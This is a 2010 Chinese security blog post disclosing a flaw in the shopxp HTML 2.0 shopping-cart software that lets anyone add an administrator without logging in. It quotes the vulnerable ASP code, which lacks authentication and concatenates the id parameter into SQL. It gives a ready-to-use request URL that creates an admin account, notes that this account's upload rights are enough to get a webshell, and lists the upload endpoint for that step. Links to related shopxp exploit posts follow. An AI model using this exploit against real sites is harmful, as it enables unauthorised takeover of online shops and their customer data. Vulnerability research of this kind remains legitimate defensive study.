shopxp html版2.0直接添加管理员漏洞

2010, October 9, 6:57 PM. 原创笔记
Submitted by admin

lan3a告诉我,他发过了,原来我不是第一个,狂汗。。。

程序:shopxp html版2.0,1.0的应该也是一样的存在

漏洞:直接添加管理员

关键字:就是没找到关键字才郁闷

FROM http://www.st999.cn/blog BY 流浪的风  2010/10/9

程序下载地址:http://www.codepub.com/software/SHOPXP-7615.html

 

<!--#include file="xp.asp"-->
<%
dim adminid,action
action=request.QueryString("action")
adminid=request.QueryString("id")
if adminid="" then adminid=request("adminid")
select case action
case "save"
set rs=server.CreateObject("adodb.recordset")
rs.Open "select * from [shopxp_admin] where adminid="&adminid,conn,1,3

………………………………


rs.Update
rs.Close
set rs=nothing
response.Write "<script language=javascript>alert('操作成功!');history.go(-1);</script>"
case "del"
conn.execute "delete from [shopxp_admin] where adminid in ("&adminid&") "
'response.Redirect "manageuser.asp"
response.Redirect request.servervariables("http_referer")
end select
%>
 

调用的xp.asp:

<!--#include file="database_name.asp" -->
<%
dim conn,connstr,db
startime=timer()
db="../shopxp/"&dataname&"" '数据库
on error resume next '尝试连数据库,一直到超时,但可以加强SQL注入过滤
connstr = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & Server.MapPath(db)
'connstr="DBQ="+server.mappath(""&db&"")+";DefaultDir=;DRIVER={Microsoft Access Driver (*.mdb)};"
set conn=server.createobject("ADODB.CONNECTION")
conn.open connstr
%>

嘿嘿,也是未做过滤和验证的,那么就产生了个直接添加管理员的漏洞。

http://127.0.0.1:99/admin/savexpadmin.asp?action=add&admin2=st999&password2=st999.cn&Submit2=%CC%ED%BC%D3%B9%DC%C0%ED%D4%B1

其中的admin2和password2是要添加的管理员的用户名和密码

添加的用户虽然权限不是最高的管理员权限,但拥有编辑和上传图片的权限,就足够拿shell了。

至于拿shell的方法我就不说了,大家都知道的。

 

upfilepic_get.asp?formname=form1&editname=ad&uppath=img_shopxp/ad&filelx=jpg

Tags: shopxp

« 上一篇 | 下一篇 »

只显示10条记录相关文章
shopxp pinglun.asp 注入漏洞 (浏览: 10918, 评论: 0)
ShopXp CMS上传拿Webshell (浏览: 10580, 评论: 0)
SHOPXP网上购物系统 v8.0 (浏览: 13519, 评论: 0)
SHOPXP网上购物系统 v8.0 注入漏洞利用 (浏览: 10405, 评论: 0)
Shopxp v8.0 SQL Injection 0day (浏览: 11594, 评论: 0)
shopxp7.4 oday (未完成) (浏览: 7, 评论: 0)
Trackbacks
点击获得Trackback地址,Encode: UTF-8 点击获得Trackback地址,Encode: GB2312 or GBK 点击获得Trackback地址,Encode: BIG5
发表评论

评论内容 (必填):